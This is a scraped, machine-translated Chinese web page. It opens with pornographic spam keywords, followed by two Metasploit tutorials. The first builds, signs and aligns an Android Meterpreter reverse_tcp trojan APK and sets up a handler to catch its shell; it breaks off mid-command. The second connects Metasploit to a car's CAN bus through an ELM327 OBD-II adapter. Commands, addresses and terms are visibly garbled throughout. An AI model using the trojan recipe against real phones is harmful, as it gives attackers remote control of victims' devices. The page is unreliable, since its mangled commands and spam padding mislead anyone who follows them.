卖逼视频免费看片|狼人就干网中文字慕|成人av影院导航|人妻少妇精品无码专区二区妖婧|亚洲丝袜视频玖玖|一区二区免费中文|日本高清无码一区|国产91无码小说|国产黄片子视频91sese日韩|免费高清无码成人网站入口

kali linux怎么啟動(dòng)metasploit 為什么有人說(shuō)安卓系統(tǒng)不安全?

為什么有人說(shuō)安卓系統(tǒng)不安全?謝謝邀請(qǐng)~ ~眾所周知,手機(jī)操作系統(tǒng)的兩大巨頭:安卓和蘋(píng)果。由于Android是開(kāi)源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗(yàn)證。那么為什么安全性

為什么有人說(shuō)安卓系統(tǒng)不安全?

謝謝邀請(qǐng)~ ~

眾所周知,手機(jī)操作系統(tǒng)的兩大巨頭:安卓和蘋(píng)果。由于Android是開(kāi)源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗(yàn)證。那么為什么安全性比蘋(píng)果 s系統(tǒng)?我們?cè)趺粗溃楷F(xiàn)在邊肖將帶你驗(yàn)證安卓手機(jī)的安全性。

和往常一樣,仍然需要使用kali系統(tǒng)下集成的metasploit工具生成木馬。1.打開(kāi)kali,輸入命令【MSF venom-p Android/meter preter/reverse _ TCP lhost "IP "lport "卡利系統(tǒng)的港口可以自由設(shè)置,但不 不要將其設(shè)置為固定端口號(hào)aaa.apk "。安卓手機(jī)的安卓包都是以apk結(jié)尾的,所以應(yīng)該會(huì)生成以apk結(jié)尾的文件。

如果出現(xiàn)如下所示的信息,說(shuō)明木馬文件已經(jīng)生成,可以從根目錄找到aaa.apk文件。

然后,您需要?jiǎng)?chuàng)建特洛伊木馬文件的證書(shū)和數(shù)字簽名。因?yàn)檫呅](méi)有學(xué)過(guò)Android開(kāi)發(fā),我只是知道安裝Android軟件需要這兩樣?xùn)|西,所以我可以 不要向題主和讀者解釋它們。請(qǐng)?jiān)徫摇?/p>

2.通過(guò)命令【keytool-genkey-v-keystore-alias AAA-keyalg RSA-keysize 1024-validity 999】創(chuàng)建一個(gè)證書(shū)。

然后配置相關(guān)信息,確認(rèn)證書(shū)信息。

3.【Jarsigner-verbose-sigalgsha 1 with RSA-digestalgsha 1-keystore AAAA . apk AAA】,創(chuàng)建數(shù)字簽名。

為了保證木馬可以在大部分安卓手機(jī)上安裝運(yùn)行,需要對(duì)木馬文件進(jìn)行優(yōu)化。4.首先安裝zipalign工具,安裝命令是【apt-get install zipalign】。

然后就可以優(yōu)化木馬文件了。命令是[zipalign -v 4 aaa.apk aaaa.apk],如果出現(xiàn)錯(cuò)誤消息,可以忽略。

5、打開(kāi)安卓虛擬機(jī),邊肖用把木馬文件傳到虛擬機(jī),暫時(shí)沒(méi)有安裝。

6.用【使用exploit/multi/handler】加載攻擊模塊,用【設(shè)置有效載荷Android/米Preter/Reverse _ TCP】選擇有效載荷模塊。

然后在Android虛擬機(jī)中安裝木馬文件并運(yùn)行。

7.返回kali系統(tǒng),執(zhí)行攻擊命令【

如何使用Metasploit進(jìn)行汽車(chē)安全性測(cè)試?

步驟1:獲得OBD II連接器硬件。

首先,我們有一個(gè)可以連接到汽車(chē)ODC II連接器的設(shè)備。這里我選擇相對(duì)便宜的ODB II ELM327藍(lán)牙迷你接口。亞馬遜上的價(jià)格是8.49美元,它可以有效地與汽車(chē)的CAN網(wǎng)絡(luò)進(jìn)行通信,并使用M: "。

第二步:安裝串口。

CAN協(xié)議是串行協(xié)議,所以我們需要安裝rubygem "串行端口 "。

kali gem安裝串行端口

步驟3:連接藍(lán)牙適配器

接下來(lái),我們需要連接我們的藍(lán)牙適配器,以便與我們汽車(chē)中的ELM 327適配器進(jìn)行通信。

要連接到ELM 327設(shè)備,我們需要獲取它的MAC地址。我們可以通過(guò)使用內(nèi)置的HCTooltool掃描藍(lán)牙設(shè)備來(lái)獲取MAC地址。

堿性酒精掃描

根據(jù)掃描結(jié)果,我這里的MAC地址是00 : 19 : 6 de CHO 5-@ . com 36 : 4 a: 9d。

現(xiàn)在,我們使用這個(gè)MAC地址發(fā)送我們的藍(lán)色牙科適配器連接到ELM 327設(shè)備。注意:請(qǐng)將MAC地址用雙引號(hào)括起來(lái),如下所示。

kali rfcomm connect/dev/rfcomm 1 00 : 19 : 6 d: 36 : 4 a: 9d

步驟4:運(yùn)行ELM 327中繼

下一步是運(yùn)行ELM 327中繼,以便Metasploit可以與ELM 327芯片組通信。您可以在/usr/share/metasploit-framework/tools/hardware目錄中找到它。

kali CD/usr/share/metasploit-framework/tools/hardware kali ls-l

在運(yùn)行它之前,讓 讓我們看看它的幫助信息。

kali ruby elm327_relay.rb -h

可以看到,我們只需要設(shè)置兩個(gè)參數(shù);速度(默認(rèn)為115200)和串行設(shè)備(默認(rèn)為/dev/ttyub0)。這里的串行設(shè)備可以通過(guò)dmesg | greptys *命令來(lái)確定。

現(xiàn)在,使用串行設(shè)備運(yùn)行elm327繼電器,并將速度保持在默認(rèn)值,如下所示。

kali ruby elm 327 _ relay . r b-s/dev/ttys 0第五步:啟動(dòng)Metasploit。

現(xiàn)在我們已經(jīng)配置了Kali Linux來(lái)與ELM 327設(shè)備通信,我們需要?jiǎng)?chuàng)建一個(gè)到Metasploit的硬件橋。Metasploit是為T(mén)CP/IP通信而構(gòu)建的,現(xiàn)在我們需要它通過(guò)串口與汽車(chē)的原生CAN協(xié)議進(jìn)行通信。

首先,我們啟動(dòng)Metasploit。

卡利msfconsole

然后,搜索汽車(chē)模塊。

卡利搜索汽車(chē)

如你所見(jiàn),汽車(chē)模塊很少,功能也很有限。

我們選擇使用輔助/客戶端/hwbridge/connect模塊。

msf使用輔助/客戶端/hwbridge/connect

加載模塊后,我們可以輸入info命令來(lái)獲取關(guān)于模塊的詳細(xì)信息。

卡利信息

最后,讓 讓我們執(zhí)行這個(gè)模塊。

Msf利用步驟6:使用Metasploit汽車(chē)模塊。

現(xiàn)在,我們已經(jīng)在車(chē)輛中創(chuàng)建了Metasploit和C。協(xié)議之間的硬件橋。所以我們可以開(kāi)始使用Metasploit中的car模塊。

例如,您想要檢索車(chē)輛信息。

msf使用post/硬件/汽車(chē)/getvinfo

該模塊將查詢并收集所有車(chē)輛故障診斷碼(DTC)和其他信息,如速度、冷卻液溫度、車(chē)輛識(shí)別號(hào)(VIN ),甚至清除DTC。

現(xiàn)在,我們可以將我們的Linux系統(tǒng)和Metasploit框架直接連接到車(chē)載網(wǎng)絡(luò),直接與車(chē)載設(shè)備進(jìn)行通信!